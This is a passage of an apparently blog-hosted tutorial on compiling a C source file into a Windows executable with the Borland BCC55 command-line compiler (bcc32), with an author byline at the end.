files)</h3> <p>1. You need to place the .C (example.c) file to be compiled in the following location</p> <p><em>C:\Borland\BCC55\Bin</em></p> <p>2. Now go to the command prompt (Start->Run->type <strong>cmd</strong>->Enter)</p> <p>3. 
Make the following path the present working directory (use the CD command)</p> <p><em>C:\Borland\BCC55\Bin</em></p> <p>4. To compile the file (example.c) use the following command</p> <p><strong>bcc32 example.c</strong></p> <p>5. If there are no errors in the source code you’ll get an executable file (example.exe) in the same location (<em>C:\Borland\BCC55\Bin).</em></p> <p>6. Now you have successfully compiled the source code into an executable file (.exe file). </p> <p><em><strong>NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).</strong></em></p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0